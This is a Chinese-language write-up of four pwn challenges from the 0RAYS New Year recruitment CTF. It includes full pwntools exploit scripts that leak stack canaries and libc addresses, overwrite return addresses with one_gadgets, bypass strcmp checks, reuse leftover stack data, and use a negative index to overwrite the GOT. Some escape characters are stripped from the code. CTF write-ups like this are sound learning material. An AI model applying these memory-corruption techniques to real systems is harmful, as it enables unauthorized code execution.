0RAYS元旦招新赛

　　一共有4道pwn题，题目不算难，但是挺考验调试能力的。

pie

　　一个main函数就四次溢出...

　　第一次leak canary，第二次leak libc，第三次直接覆盖返回地址为one_gadgets，第四次摸鱼。感觉应该不是预期解，毕竟题目叫pie，程序本身有system("/bin/sh")也没有用到。

from pwn import *

p = process(['./pie'],env={"LD_PRELOAD":"./libc.so.6"})
#p = process('./pie')
elf = ELF('./pie')
libc = ELF('./libc.so.6')
context.log_level = 'debug'

og = [0x4f3d5,0x4f432,0x10a41c]

p.sendafter('name?
','a'*0x18+'b')
p.recvuntil('b')
canary = u64(p.recv(7).rjust(8,'x00'))
print 'canary-->'+hex(canary)

p.sendafter('from?
','a'*0x20+'bbbbbbbb')
p.recvuntil('bbbbbbbb')
libc_base = u64(p.recv(6).ljust(8,'x00'))-231-libc.symbols['__libc_start_main']
print 'libc_base'+hex(libc_base)
shell = libc_base+og[0]

p.sendafter('know?
',p64(libc_base)+'a'*0x10+p64(canary)+'bbbbbbbb'+p64(shell))
p.sendafter('no)
','nox00')
p.recv()
p.interactive()

QAQ

　　此题不适合看伪代码，得直接看汇编。

　　只有一个输入。还是需要读一下汇编。

　　执行完call，返回值一般是保存在eax中，这里执行了test eax,eax，其实就是在改变标志寄存器，我们这里需要让strcmp的返回值是0，这样就能跳转到loc_8048547这里。

　　看栈空间就可以知道，buf和s2，就是相比较的这两个字符串相差10个字节。

　　我们写payload='a'*9+'x00'+'a'*9+'x00'，并且在跳转那里下断点。

　　第一次跳转之后，还有一层需要绕过。

　　判断ebp+var_44的值和1Bh是否相等，如果相等才能执行system("/bin/sh")。看栈空间分布，发现这个我们没办法赋值。

　　在buf上面，没办法写入。这个时候我又看上面的汇编。

　　发现有一处就是给这个位置赋值的，是将ebp+0xarg_0赋值给这个位置。而ebp+0xarg_0是在返回地址下面。距离也很好算，用静态分析，动态分析都能看出怎么多远。这题就算是做完了。

from pwn import *

p = process('./pwn')
context.log_level = 'debug'

#gdb.attach(p,'b *0x08048534')

sleep(0.1)
p.send('aaaaaaaaax00'+'aaaaaaaaax00aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaax1b')
p.interactive()

easyStack

　　64位程序，没开pie。

　　主要就是要让shell大于3920，进入backdoor，里面有shell。

　　在question中，有一个scanf函数是往v1里面写值。而v1是栈上的，而且不受我们控制。我当时想了半天也不知道怎么做。在name函数中也没有发现漏洞点。

　　后来想到以前做过一道栈数据残留的题，然后就cyclic 100，写入数据，在question中scanf那里下断点。看看这个时候的v1是多少。

　　果然name函数的值没有被清空，残留到了这个栈里面。此时v1是让paaa填充的。所以我们将cyclic生成的paaa处写入p32(shell)，然后写入一个大于3920的数字，顺利执行就能拿到shell了。

from pwn import *

p = process('./pwn')
elf = ELF('./pwn')
context.log_level = 'debug'

def duan():
    gdb.attach(p)
    pause()
shell = 0x060108C
payload = 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaa'+p32(shell)

p.sendafter('name?
',payload)
p.sendafter('else?
','pwner')
p.sendlineafter('1/0]
','4000')
p.recv()
p.interactive()

PTT0的记账本

　　题目其实已经给提示了。。。

　　看着像一道heap，其实并不是。。。感觉我应该是写的比较麻烦了。漏洞点就是在写index的时候，写成负数，虽然是在bss段，但是上面就是got段，将指针申请上去，可以泄露libc基地址，然后改写got表。直接放exp了。

from pwn import *

p = process(['./book'],env={"LD_PRELOAD":"./libc.so.6"})
#p = process('./book')
elf = ELF('./book')
libc = ELF('./libc.so.6')
context.log_level = 'debug'

og = [0x4f3d5,0x4f432,0x10a41c]

def duan():
    gdb.attach(p)
    pause()

def add(index,time,deaeline,money,interest,name):
    p.sendlineafter('>> ','1')
    p.sendlineafter('index:',str(index))
    p.sendlineafter('time: ',str(time))
    p.sendlineafter('deadline: ',str(deaeline))
    p.sendlineafter('money: ',str(money))
    p.sendlineafter('interest: ',str(interest))
    p.sendafter('name: ',name)

def delete(index):
    p.sendlineafter('>> ','2')
    p.sendlineafter('index:',str(index))

def show(index):
    p.sendlineafter('>> ','3')
    p.sendlineafter('index:',str(index))


show(-6)
p.recvuntil('time: ')
time = int(p.recvuntil('
')[:-1])
print 'time-->'+hex(time)

p.recvuntil('deadline: ')
deadline = int(p.recvuntil('
')[:-1])
print 'deadline-->'+hex(deadline)

#leak libc
p.recvuntil('money: ')
money = p.recvuntil('
')[:-1]
p.recvuntil('interest: ')
interest = p.recvuntil('
')[:-1]
printf_got = str(hex(int(interest)))+str(hex(int(money)))
printf_got = int(printf_got[:6]+printf_got[8:],16)
print 'print_got-->'+hex(printf_got)
libc_base = printf_got-libc.symbols['printf']
print 'libc_base-->'+hex(libc_base)

for i in range(len(og)):
    print str(i)+'-->'+hex(libc_base+og[i])
shell = str(hex(libc_base+og[2]))
payload = int('0x'+shell[-8:],16)
print payload

p.sendlineafter('>> ','1')
p.sendlineafter('index:',str(-6))
p.sendlineafter('time: ',str(0xaa))
p.sendlineafter('deadline: ',str(0xbb))
p.sendlineafter('money: ',str(payload))
p.interactive()

　　因为做的人不多，题目难度不大，赶着做还是拿了两道题的一血，两道题的二血，也有一些收获，总之还是很开兴的。